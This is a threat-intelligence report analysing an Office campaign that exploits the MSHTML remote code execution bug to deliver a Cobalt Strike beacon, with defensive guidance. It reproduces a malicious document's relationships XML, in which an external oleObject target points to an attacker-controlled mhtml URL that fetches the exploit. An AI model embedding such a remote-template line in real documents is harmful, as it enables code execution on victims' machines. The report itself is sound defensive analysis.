OverviewMSHTML (Microsoft HTML) engine, aka Trident, is a browser engine developed by Microsoft for Internet Explorer. The Microsoft Office suite supports MSHTML, which is being abused by threat actors to gain code execution on targeted systems. Attackers craft a malicious ActiveX control, which is then abused by a Microsoft Office document that hosts the browser rendering engine. They then persuade the victim to open this malicious document, which in turn triggers the logical flaw in MSHTML. These malicious documents are delivered via Office 365. By default, the documents downloaded from the Internet are opened in Protected View or Application Guard for Office, both of which defend against such attacks. However, if the user continues to download the content bypassing the mitigation measures, the target machine will be exploited, and malware agents such as CobaltStrike Beacon are deployed. Microsoft Defender for Endpoint has been updated to flag such attacks, displaying a warning note that reads: “Suspicious Cpl File Execution.” Based on the quality of the vulnerability research and scale at which users are being targeted, it is most likely that an advanced adversary is responsible for the ongoing campaign. CloudSEK Threat Intelligence Research team has obtained malicious artifacts to retrieve the TTPs (Tactics, Techniques, and Procedures) used by the adversaries that leverage the MSHTML RCE bug to provide better security for our clients. This report provides the technical analysis of the campaign. Specifics regarding the exploit for the vulnerability have been intentionally withheld to avoid misuse in the public domain as a large number of systems continue to be susceptible.
Remote Template Injection TechniqueMicrosoft Word/ Excel documents are an archived collection of XML files that retain the information and data provided by the user while creating the document on corresponding Office applications. In simple words, one can easily unzip the doc files to see internal XML files that contain various metadata. The directory “word\_rels” in unzipped Word/ Excel files plays a very significant role in weaponizing a seemingly benign document. The directory ‘_rels’ stores relationship metadata which helps to fetch the template used by the document when it gets loaded by Office. An SMB address or HTTP URL of the asset controlled by the attacker can be provided to execute the malicious payload. For the remote template injection vector, we need to search for <Relationship> XML attributes, for which the TargetMode is set to ”External”. In this case, we could search for a malicious URL to exploit the code provided as a value to the <Relationship> attribute, where <TargetMode> is external. Office, then, downloads the specific file that the particular URL points to.
|<?xml version="1.0" encoding="UTF-8" standalone="true"?> -<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Target="theme/theme1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Id="rId8"/> <Relationship Target="webSettings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Id="rId3"/> <Relationship Target="fontTable.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Id="rId7"/> <Relationship Target="settings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Id="rId2"/> <Relationship Target="styles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Id="rId1"/> <Relationship Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Id="rId6" TargetMode="External"/> <Relationship Target="media/image2.wmf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId5"/> <Relationship Target="media/image1.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/> </Relationships>|
Cobalt Strike BeaconA basic image analysis shows that the ‘champion.inf' file is, in fact, a 64-bit DLL (Dynamic Link Library) and its first bytes text is “MZ.” The CPL file is a control panel item that has code execution capabilities. A DLL becomes CPL when it exports a particular function called ‘CplApplet', which can be readily executed like a PE (Portable Executable). Windows Defender flags this as “Trojan:Win32/Agent.SA", and the other security solutions flag it as “Trojan.Win64.COBEACON.SUZ."
Dynamic Analysis of the ExploitWhen the exploit code successfully triggers the vulnerability to gain remote code execution, the payload deployed as a result of the code execution is a Cobalt Strike beacon as discussed above. CloudSEK researchers recreated the exploit code and ran it to get a better understanding of the vulnerability. The researchers used Process Monitor to analyse the execution flow of the Office document (WINWORD.EXE) and found few interesting results that are shared below.
Loading of Vulnerable ModuleMicrosoft Word application loads mshtml.dll from Windows Directory. The vulnerability resides in one of the functionalities defined in the DLL files. Based on CloudSEK’s testing, mshtml.dll is not loaded into WINWORD.EXE by default. When the attacker delivers an exploit written in HTML via Remote Template Injection, the handler provided in the <Relationship> attribute is mhtml. This leads to loading the mshtml module into the Word application to render the HTML page within the Word document.
File WritingFinal payload championship.inf is extracted from the initial ministry.cab archive file and is written to the Temp directory. This is probably caused by the vulnerability which is abused by adversaries to write user-controlled data on the file disk.
Code ExecutionCloudSEK researchers also identified multiple control.exe processes that are spawned to execute the given CPL payload. Each of these processes search for the champion.inf file in directories that are hardcoded in the exploit. Here’s a list of the hardcoded directories to which the payload is dropped.
GuidelinesBased on the official guidelines posted by Microsoft, Windows users need to follow the instructions given below:
- Disable ActiveX via Group Policy*
- Disable ActiveX on individual systems via registry
- Disable shell preview in Windows Explorer
- Enterprise customers who manage updates should select the detection build 1.349.22.0
Indicators of Compromise (IOCs)